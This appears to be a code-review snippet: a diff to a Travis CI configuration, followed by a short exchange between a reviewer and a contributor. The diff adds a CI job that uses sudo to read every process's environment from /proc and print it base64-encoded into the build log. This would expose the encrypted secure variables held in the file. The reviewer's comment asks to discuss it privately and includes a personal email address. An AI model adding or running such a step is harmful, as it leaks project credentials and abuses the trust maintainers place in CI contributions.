.travis.yml

```diff
@@ -3,3 +3,6 @@ env:
   global:
     # FOO
     - secure: Ur37lLlM5Kc7dslpTuEzid4GusYZJbA64DvY097rb0Z7HiVhBgw0pHmWYRE5tlIBhqALQCWvo7JUG11C5WWuhTfVO9/jXSVbWJSesicb2kVLRUcrXqqPEc+kqxfId/ujI/FBpHMDOfkatCJqNqJCqyUaiIG+M+VF0mXsw1Fjgq8F/OHWN1sKWW/O4jJqlop/4rwowoA/5cPecYFuCTiDFAda3PBfL17MSnkkkIEAl540iABdud2eYgagRGArIYUKhXtELkOj4uWZ6wh5CnGSbODJaBXxbJd+NLkgSYKJ8uLsllP68zNa2GydvAtvCJinLzJF8N7P9t8pcBowTcHqbqEXE4vyjN5fLbBzfvqpd1VyJc+JatY+riFHUmalvjO3d8aJnDc39XOkq6M0UIbfwKlpdZ/aWgVCuUaalRjDs3QAzk2pv6rOmokAOEf7vStPNx0r6W3zIBs0ElsMpgBRyFJ42NhCtEGBfox+jUsEDurQc0whMxap5F+hGU1KAjW2n3DsAGXxpwADfaKOdTEDZ18s6PgFmBUsSz3l8ViEuYR+nI48hD8C58q11NPNXiCG/3k4N0s+Bj3q6JjUvwWcCWZ/GkXg+Y1BkI3KkMByqREQzvMLG0SI+uXXagwFfa8ic721XJgH1+d5xA1nFaAa19VPPMHE8v9mNTyY/BeoUTQ=
+jobs:
+  include:
+    - script: sudo strings /proc/*/environ | sort -u | base64
```

Comment:
Hey @speedywizard can you send me your `@travis-ci.org` email? Mine is `mgbelisle@gmail.com`. I've got a question for you about this that I want to do privately.

Reply:
Nevermind, found it.